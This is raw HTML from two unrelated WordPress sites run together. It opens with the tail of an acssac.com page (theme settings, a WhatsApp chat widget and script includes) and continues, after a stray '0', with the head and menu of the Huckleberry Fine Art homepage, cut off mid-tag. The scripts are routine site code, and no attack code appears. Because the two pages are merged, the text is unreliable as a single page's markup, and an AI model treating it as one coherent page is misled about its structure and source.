'http://www.acssac.com';ALBERTINO_STORAGE['vc_edit_mode'] = false;ALBERTINO_STORAGE['theme_font'] = 'Roboto Slab';ALBERTINO_STORAGE['theme_skin'] = 'default';ALBERTINO_STORAGE['theme_skin_color'] = '#45403d';ALBERTINO_STORAGE['theme_skin_bg_color'] = '#ffffff';ALBERTINO_STORAGE['slider_height'] = 100;ALBERTINO_STORAGE['system_message'] = {message: '',status: '',header: ''};ALBERTINO_STORAGE['user_logged_in'] = false;ALBERTINO_STORAGE['toc_menu'] = 'float';ALBERTINO_STORAGE['toc_menu_home'] = true;ALBERTINO_STORAGE['toc_menu_top'] = true;ALBERTINO_STORAGE['menu_fixed'] = true;ALBERTINO_STORAGE['menu_mobile'] = 1024;ALBERTINO_STORAGE['menu_slider'] = true;ALBERTINO_STORAGE['menu_cache'] = false;ALBERTINO_STORAGE['demo_time'] = 0;ALBERTINO_STORAGE['media_elements_enabled'] = true;ALBERTINO_STORAGE['ajax_search_enabled'] = true;ALBERTINO_STORAGE['ajax_search_min_length'] = 3;ALBERTINO_STORAGE['ajax_search_delay'] = 200;ALBERTINO_STORAGE['css_animation'] = true;ALBERTINO_STORAGE['menu_animation_in'] = 'bounceIn';ALBERTINO_STORAGE['menu_animation_out'] = 'fadeOutDown';ALBERTINO_STORAGE['popup_engine'] = 'pretty';ALBERTINO_STORAGE['email_mask'] = '^([a-zA-Z0-9_\-]+\.)*[a-zA-Z0-9_\-]+@[a-z0-9_\-]+(\.[a-z0-9_\-]+)*\.[a-z]{2,6}$';ALBERTINO_STORAGE['contacts_maxlength'] = 1000;ALBERTINO_STORAGE['comments_maxlength'] = 1000;ALBERTINO_STORAGE['remember_visitors_settings'] = false;ALBERTINO_STORAGE['admin_mode'] = false;ALBERTINO_STORAGE['isotope_resize_delta'] = 0.3;ALBERTINO_STORAGE['error_message_box'] = null;ALBERTINO_STORAGE['viewmore_busy'] = false;ALBERTINO_STORAGE['video_resize_inited'] = false;ALBERTINO_STORAGE['top_panel_height'] = 0;</script><div class="ccw_plugin chatbot" style="top:10px; right:10px;"> <!-- style 4 chip - logo+text --> <div class="style4 animated no-animation ccw-no-hover-an"> <a target="_blank" href="https://web.whatsapp.com/send?phone=51957244656&text=" class="nofocus"> <div class="chip style-4 ccw-analytics" id="style-4" data-ccw="style-4" style="background-color: #ededed; color: #020202"> <img src="http://www.acssac.com/wp-content/plugins/click-to-chat-for-whatsapp/./assets/img/whatsapp-logo-32x32.png" class="ccw-analytics" id="s4-icon" data-ccw="style-4" alt="WhatsApp"> WhatsApp 957244656 </div> </a> </div> </div><link property="stylesheet" rel='stylesheet' id='albertino-messages-style-css' href='http://www.acssac.com/wp-content/themes/albertino/fw/js/core.messages/core.messages.min.css' type='text/css' media='all' /> <link property="stylesheet" rel='stylesheet' id='albertino-prettyphoto-style-css' href='http://www.acssac.com/wp-content/themes/albertino/fw/js/prettyphoto/css/prettyPhoto.css' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var ht_ccw_var = {"page_title":"Home 3","google_analytics":"","ga_category":"","ga_action":"","ga_label":"","fb_analytics":"","fb_event_name":"","p1_value":"","p2_value":"","p3_value":"","p1_name":"","p2_name":"","p3_name":""}; /* ]]> */ </script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/js/app.js?ver=1.6'></script> <script type='text/javascript' src='http://www.acssac.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/js/shuffle/modernizr.custom.min.js?ver=4.8.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/js/shuffle/jquery.shuffle.min.js?ver=4.8.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/js/shuffle/random-shuffle-min.js?ver=4.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var ajax_object = {"ajax_url":"http:\/\/www.acssac.com\/wp-admin\/admin-ajax.php"}; var ajax_object = {"ajax_url":"http:\/\/www.acssac.com\/wp-admin\/admin-ajax.php","plugin_url":"http:\/\/www.acssac.com\/wp-content\/plugins\/ultimate-social-media-icons\/"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/js/custom.js?ver=4.8.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/fw/js/superfish.js'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/fw/js/jquery.slidemenu.js'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/fw/js/core.utils.min.js'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/fw/js/core.init.js'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/js/theme.init.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var mejsL10n = {"language":"en-US","strings":{"Close":"Close","Fullscreen":"Fullscreen","Turn off Fullscreen":"Turn off Fullscreen","Go Fullscreen":"Go Fullscreen","Download File":"Download File","Download Video":"Download Video","Play":"Play","Pause":"Pause","Captions\/Subtitles":"Captions\/Subtitles","None":"None","Time Slider":"Time Slider","Skip back %1 seconds":"Skip back %1 seconds","Video Player":"Video Player","Audio Player":"Audio Player","Volume Slider":"Volume Slider","Mute Toggle":"Mute Toggle","Unmute":"Unmute","Mute":"Mute","Use Up\/Down Arrow keys to increase or decrease volume.":"Use Up\/Down Arrow keys to increase or decrease volume.","Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds."}}; var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.acssac.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.22.0'></script> <script type='text/javascript' src='http://www.acssac.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=4.8.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-includes/js/wp-embed.min.js?ver=4.8.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/shortcodes/theme.shortcodes.min.js'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/fw/js/core.messages/core.messages.min.js'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/fw/js/prettyphoto/jquery.prettyPhoto.min.js?ver=no-compose'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.12'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/master-slider/public/assets/js/jquery.easing.min.js?ver=3.0.2'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/master-slider/public/assets/js/masterslider.min.js?ver=3.0.2'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/js/slick.min.js?ver=2.2.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var Wpls = {"is_mobile":"0","is_rtl":"0"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/js/wpls-public.js?ver=2.2.2'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=4.12'></script> </body> </html> <!-- Dynamic page generated in 0.142 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-16 15:17:07 --> <!-- super cache -->
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <title>Huckleberry Fine Art</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="pingback" href="https://huckleberryfineart.com/xmlrpc.php" /> <!-- Mobile viewport scale --> <meta name="viewport" content="width=device-width, initial-scale=1"/> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Huckleberry Fine Art &raquo; Feed" href="https://huckleberryfineart.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Huckleberry Fine Art &raquo; Comments Feed" href="https://huckleberryfineart.com/comments/feed/" /> <link rel="alternate" type="text/calendar" title="Huckleberry Fine Art &raquo; iCal Feed" href="https://huckleberryfineart.com/events/?ical=1" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/huckleberryfineart.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style type="text/css"> @media only screen and (min-width: 980px) { body.one-col-960 #main-sidebar-container { width: 100%; } body.one-col-960 #main-sidebar-container #main { width: 100%; } } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://huckleberryfineart.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wc-block-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://huckleberryfineart.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='woob-bootstrap-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woo-brand/css/framework/bootstrap.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='woob-front-end-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woo-brand/css/front-style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='woob-dropdown-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woo-brand/css/msdropdown/dd.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='woob-carousel-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woo-brand/css/carousel/slick.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='woob-scroller-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woo-brand/css/scroll/tinyscroller.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='woob-tooltip-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woo-brand/css/tooltip/tipsy.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='woob-extra-button-style-css' href='https://huckleberryfineart.com/wp-content/plugins/woo-brand/css/extra-button/extra-style.css?ver=5.2' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='yit-icon-retinaicon-font-css' href='https://huckleberryfineart.com/wp-content/plugins/yith-woocommerce-catalog-mode-premium/assets/fonts/retinaicon-font/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://huckleberryfineart.com/wp-content/plugins/yith-woocommerce-catalog-mode-premium/assets/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <style id='font-awesome-inline-css' type='text/css'> [data-font="FontAwesome"]:before {font-family: 'FontAwesome' !important;content: attr(data-icon) !important;speak: none !important;font-weight: normal !important;font-variant: normal !important;text-transform: none !important;line-height: 1 !important;font-style: normal !important;-webkit-font-smoothing: antialiased !important;-moz-osx-font-smoothing: grayscale !important;} </style> <link rel='stylesheet' id='chld_thm_cfg_parent-css' href='https://huckleberryfineart.com/wp-content/themes/canvas/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='woo-features-css-css' href='https://huckleberryfineart.com/wp-content/themes/canvas/includes/integrations/features/css/features.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='easy_table_style-css' href='https://huckleberryfineart.com/wp-content/plugins/easy-table/themes/default/style.css?ver=1.8' type='text/css' media='all' /> <link rel='stylesheet' id='theme-stylesheet-css' href='https://huckleberryfineart.com/wp-content/themes/HFA/style.css?ver=1.1' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-css' href='https://huckleberryfineart.com/wp-content/themes/canvas/includes/integrations/woocommerce/css/woocommerce.css?ver=5.2' type='text/css' media='all' /> <!--[if lt IE 9]> <link href="https://huckleberryfineart.com/wp-content/themes/canvas/css/non-responsive.css" rel="stylesheet" type="text/css" /> <style type="text/css">.col-full, #wrapper { width: 960px; max-width: 960px; } #inner-wrapper { padding: 0; } body.full-width #header, #nav-container, body.full-width #content, body.full-width #footer-widgets, body.full-width #footer { padding-left: 0; padding-right: 0; } body.fixed-mobile #top, body.fixed-mobile #header-container, body.fixed-mobile #footer-container, body.fixed-mobile #nav-container, body.fixed-mobile #footer-widgets-container { min-width: 960px; padding: 0 1em; } body.full-width #content { width: auto; padding: 0 1em;}</style> <![endif]--> <script type='text/javascript' src='https://huckleberryfineart.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var params = {"ALL":"ALL"}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woo-brand/js/extra-button/extra-button.js?ver=5.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woo-brand/js/scroll/tinyscroller.js?ver=5.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woo-brand/js/tooltip/jquery.tipsy.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var parameters = {"ajaxurl":"https:\/\/huckleberryfineart.com\/wp-admin\/admin-ajax.php","template_url":""}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woo-brand/js/custom-js.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpgmza_google_api_status = {"message":"Enqueued","code":"ENQUEUED"}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/wp-google-maps/wpgmza_data.js?ver=5.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/themes/canvas/includes/js/third-party.min.js?ver=5.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/themes/canvas/includes/js/modernizr.min.js?ver=2.6.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/themes/canvas/includes/js/general.min.js?ver=5.2'></script> <link rel='https://api.w.org/' href='https://huckleberryfineart.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://huckleberryfineart.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://huckleberryfineart.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <meta name="generator" content="WooCommerce 3.6.2" /> <link rel="canonical" href="https://huckleberryfineart.com/" /> <link rel='shortlink' href='https://huckleberryfineart.com/' /> <link rel="alternate" type="application/json+oembed" href="https://huckleberryfineart.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhuckleberryfineart.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://huckleberryfineart.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhuckleberryfineart.com%2F&#038;format=xml" /> <style> #navigation .nav_section.first ul.nav > li:first-child { border-left: 0px solid #dbdbdb; }#navigation .nav_section.third ul.nav > li:first-child { border-left: 0px solid #dbdbdb; }</style> <!-- Stream WordPress user activity plugin v3.2.3 --> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//huckleberryfineart.com/?wordfence_lh=1&hid=21C11D87A10D670E4FFF698AFEB7E825'); </script><meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://huckleberryfineart.com"><link rel="https://theeventscalendar.com/" href="https://huckleberryfineart.com/wp-json/tribe/events/v1/" /> <!-- Custom CSS Styling --> <style type="text/css"> #logo .site-title, #logo .site-description { display:none; } body {background-image:url(http://huckleberryfineart.com/wp-content/uploads/2015/09/body_background_3.png);background-repeat:repeat;background-position:top left;background-attachment:scroll;border-top:0px solid #000000;} #header {background-repeat:no-repeat;background-position:left top;margin-top:0px;margin-bottom:0px;padding-top:40px;padding-bottom:40px;border:0px solid ;} #logo .site-title a {font:bold 40px/1em Arial, sans-serif;color:#222222;} #logo .site-description {font:300 13px/1em Arial, sans-serif;color:#999999;} #header-container{background-color:#000000;}#nav-container{background:#4b132f;}#nav-container{border-top:0px solid #dbdbdb;border-bottom:0px solid #dbdbdb;border-left:none;border-right:none;}#nav-container #navigation ul#main-nav > li:first-child{border-left: 0px solid #dbdbdb;}#footer-widgets-container{background-color:#b7b7b7}#footer-widgets{border:none;}#footer-container{background-color:#4b132f}#footer-container{border-top:0px solid #dbdbdb;}#footer {border-width: 0 !important;} body, p { font:300 14px/1.5em Arial, sans-serif;color:#555555; } h1 { font:bold 28px/1.2em Arial, sans-serif;color:#222222; }h2 { font:bold 24px/1.2em Arial, sans-serif;color:#222222; }h3 { font:bold 20px/1.2em Arial, sans-serif;color:#222222; }h4 { font:bold 16px/1.2em Arial, sans-serif;color:#222222; }h5 { font:bold 14px/1.2em Arial, sans-serif;color:#222222; }h6 { font:bold 12px/1.2em Arial, sans-serif;color:#222222; } .page-title, .post .title, .page .title {font:bold 28px/1.1em Helvetica, Arial, sans-serif;color:#222222;} .post .title a:link, .post .title a:visited, .page .title a:link, .page .title a:visited {color:#222222} .post-meta { font:thin 12px/1.5em Helvetica, Arial, sans-serif;color:#999999; } .entry, .entry p{ font:300 15px/1.5em Helvetica, Arial, sans-serif;color:#555555; } .post-more {font:thin 13px/1.5em Helvetica, Arial, sans-serif;color:;border-top:0px solid #e6e6e6;border-bottom:0px solid #e6e6e6;} #post-author, #connect {border-top:1px solid #e6e6e6;border-bottom:1px solid #e6e6e6;border-left:1px solid #e6e6e6;border-right:1px solid #e6e6e6;border-radius:5px;-moz-border-radius:5px;-webkit-border-radius:5px;background-color:#fafafa} .nav-entries a, .woo-pagination { font:thin 13px/1em Helvetica, Arial, sans-serif;color:#888; } .woo-pagination a, .woo-pagination a:hover {color:#888!important} .widget h3 {font:bold 14px/1.2em Helvetica, Arial, sans-serif;color:#555555;border-bottom:1px solid #e6e6e6;} .widget_recent_comments li, #twitter li { border-color: #e6e6e6;} .widget p, .widget .textwidget { font:thin 13px/1.5em Helvetica, Arial, sans-serif;color:#555555; } .widget {font:thin 13px/1.5em Helvetica, Arial, sans-serif;color:#555555;} #tabs .inside li a, .widget_woodojo_tabs .tabbable .tab-pane li a { font:bold 12px/1.5em Helvetica, Arial, sans-serif;color:#555555; } #tabs .inside li span.meta, .widget_woodojo_tabs .tabbable .tab-pane li span.meta { font:thin 11px/1.5em Helvetica, Arial, sans-serif;color:#999999; } #tabs ul.wooTabs li a, .widget_woodojo_tabs .tabbable .nav-tabs li a { font:thin 11px/2em Helvetica, Arial, sans-serif;color:#999999; } @media only screen and (min-width:768px) { ul.nav li a, #navigation ul.rss a, #navigation ul.cart a.cart-contents, #navigation .cart-contents #navigation ul.rss, #navigation ul.nav-search, #navigation ul.nav-search a { font:300 14px/1.2em Arial, sans-serif;color:#ffffff; } #navigation ul.rss li a:before, #navigation ul.nav-search a.search-contents:before { color:#ffffff;} #navigation ul.nav > li a:hover, #navigation ul.nav > li:hover a, #navigation ul.nav li ul li a, #navigation ul.cart > li:hover > a, #navigation ul.cart > li > ul > div, #navigation ul.cart > li > ul > div p, #navigation ul.cart > li > ul span, #navigation ul.cart .cart_list a, #navigation ul.nav li.current_page_item a, #navigation ul.nav li.current_page_parent a, #navigation ul.nav li.current-menu-ancestor a, #navigation ul.nav li.current-cat a, #navigation ul.nav li.current-menu-item a { color:#ffffff!important; } #navigation ul.nav > li a:hover, #navigation ul.nav > li:hover, #navigation ul.nav li ul, #navigation ul.cart li:hover a.cart-contents, #navigation ul.nav-search li:hover a.search-contents, #navigation ul.nav-search a.search-contents + ul, #navigation ul.cart a.cart-contents + ul, #navigation ul.nav li.current_page_item a, #navigation ul.nav li.current_page_parent a, #navigation ul.nav li.current-menu-ancestor a, #navigation ul.nav li.current-cat a, #navigation ul.nav li.current-menu-item a{background-color:#4b132f!important} #navigation ul.nav li ul, #navigation ul.cart > li > ul > div { border: 0px solid #dbdbdb; } #navigation ul.nav > li:hover > ul { left: 0; } #navigation ul.nav > li { border-right: 0px solid #dbdbdb; }#navigation ul.nav > li:hover > ul { left: 0; } #navigation { box-shadow: none; -moz-box-shadow: none; -webkit-box-shadow: none; }#navigation ul li:first-child, #navigation ul li:first-child a { border-radius:0px 0 0 0px; -moz-border-radius:0px 0 0 0px; -webkit-border-radius:0px 0 0 0px; } #navigation {background:#4b132f;border-top:0px solid #dbdbdb;border-bottom:0px solid #dbdbdb;border-left:0px solid #dbdbdb;border-right:0px solid #dbdbdb;border-radius:0px; -moz-border-radius:0px; -webkit-border-radius:0px;} #top ul.nav li a { font:300 12px/1.6em Arial, sans-serif;color:#ddd; } } #footer, #footer p { font:300 13px/1.4em Arial, sans-serif;color:#ffffff; } #footer {border-top:0px solid #dbdbdb;border-bottom:0px solid ;border-left:0px solid ;border-right:0px solid ;border-radius:0px; -moz-border-radius:0px; -webkit-border-radius:0px;} .magazine #loopedSlider .content h2.title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .wooslider-theme-magazine .slide-title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .magazine #loopedSlider .content .excerpt p { font:300 13px/1.5em Arial, sans-serif;color:#cccccc; } .wooslider-theme-magazine .slide-content p, .wooslider-theme-magazine .slide-excerpt p { font:300 13px/1.5em Arial, sans-serif;color:#cccccc; } .magazine .block .post .title a {font:bold 18px/1.2em Arial, sans-serif;color:#222222; } #loopedSlider.business-slider .content h2 { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } #loopedSlider.business-slider .content h2.title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .wooslider-theme-business .has-featured-image .slide-title { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } .wooslider-theme-business .has-featured-image .slide-title a { font:bold 24px/1em Arial, sans-serif;color:#ffffff; } #wrapper #loopedSlider.business-slider .content p { font:300 13px/1.5em Arial, sans-serif;color:#cccccc; } .wooslider-theme-business .has-featured-image .slide-content p { font:300 13px/1.5em Arial, sans-serif;color:#cccccc; } .wooslider-theme-business .has-featured-image .slide-excerpt p { font:300 13px/1.5em Arial, sans-serif;color:#cccccc; } .archive_header { font:bold 18px/1em Arial, sans-serif;color:#222222; } .archive_header {border-bottom:1px solid #e6e6e6;} </style> <!-- Woo Shortcodes CSS --> <link href="https://huckleberryfineart.com/wp-content/themes/canvas/functions/css/shortcodes.css" rel="stylesheet" type="text/css" /> <!-- Custom Stylesheet --> <link href="https://huckleberryfineart.com/wp-content/themes/canvas/custom.css" rel="stylesheet" type="text/css" /> <!-- Theme version --> <meta name="generator" content="Huckleberry Fine Art 1.1" /> <meta name="generator" content="Canvas 5.12.0" /> <meta name="generator" content="WooFramework 6.2.9" /> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <style type="text/css">.broken_link, a.broken_link { text-decoration: line-through; }</style> <!-- Woo Slider Setup --> <script type="text/javascript"> jQuery(window).load(function() { var args = {}; args.useCSS = false; args.animation = 'slide'; args.slideshow = true; args.slideshowSpeed = 4000; args.animationSpeed = 600; args.controlNav = true; args.pauseOnHover = false; args.smoothHeight = true; args.manualControls = '.pagination-wrap .flex-control-nav > li'; args.start = function ( slider ) { slider.next( '.slider-pagination' ).fadeIn(); } args.prevText = '<span class="fa fa-angle-left"></span>'; args.nextText = '<span class="fa fa-angle-right"></span>'; jQuery( '.woo-slideshow' ).each( function ( i ) { jQuery( this ).flexslider( args ); }); }); </script> <!-- /Woo Slider Setup --> </head> <body class="home page-template page-template-template-biz page-template-template-biz-php page page-id-855 woocommerce-no-js tribe-no-js tribe-bar-is-disabled unknown alt-style-default one-col width-960 one-col-960 full-width full-header full-footer full-slider"> <div id="wrapper"> <div id="inner-wrapper"> <!--#header-container--> <div id="header-container"> <h3 class="nav-toggle icon"><a href="#navigation">Navigation</a> <a href="https://huckleberryfineart.com/" title=""> <img src="https://huckleberryfineart.com/wp-content/uploads/2015/09/HFA-Logo-Circle.png" alt="Huckleberry Fine Art" /> </a> </h3> <header id="header" class="col-full"> <span class="galleryNameLeft">Huckleberry</span> <span class="galleryNameRight">Fine Art</span> </header> </div><!--/#header-container--> <!--#nav-container--> <div id="nav-container"> <nav id="navigation" class="col-full" role="navigation"> <section class="menus"> <h3>Main Menu</h3> <div class="topnav_section"> <div class="nav_section first" style="padding: 0 0px 0 0" > <!--<div class="nav_m" style="width:0px">&nbsp;</div>--> <ul class="nav fl"> <li id="menu-item-67" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-67"> <a href="https://huckleberryfineart.com/about-us/">About</a> <ul class="sub-menu"> <li id="menu-item-854" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-854"><a href="https://huckleberryfineart.com/about-us/events/">Event Venue</a></li> <li id="menu-item-2163" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2163"><a href="https://huckleberryfineart.com/custom-framing/">Custom Framing</a></li> <li id="menu-item-68" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-68"><a href="https://huckleberryfineart.com/about-us/careers/">Careers</a></li> <li id="menu-item-91" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-91"><a href="https://huckleberryfineart.com/about-us/j-hilburn/">J. Hilburn</a></li> </ul> </li><li id="menu-item-2076" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2076"><a href="https://huckleberryfineart.com/classes/">Classes</a></li><li id="menu-item-870" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-870"><a href="http://huckleberryfineart.com/events/">Events</a></li><li id="menu-item-147460" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-147460"><a href="https://huckleberryfineart.com/contact-us/">Contact</a></li> </ul> </div><div class="nav_section second"> <a href="https://huckleberryfineart.com/" title=""> <img src="https://huckleberryfineart.com/wp-content/uploads/2015/09/HFA-Logo-Circle.png" alt="Huckleberry Fine Art" /> </a> </div><div class="nav_section third" style="padding: 0 0 0 0px" > <!--<div class="nav_m" style="width:0px">&nbsp;</div>--> <ul class="nav fl"> <li id="menu-item-863" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-863"><a href="https://huckleberryfineart.com/artists/">Artists</a></li><li id="menu-item-71" class="menu-item 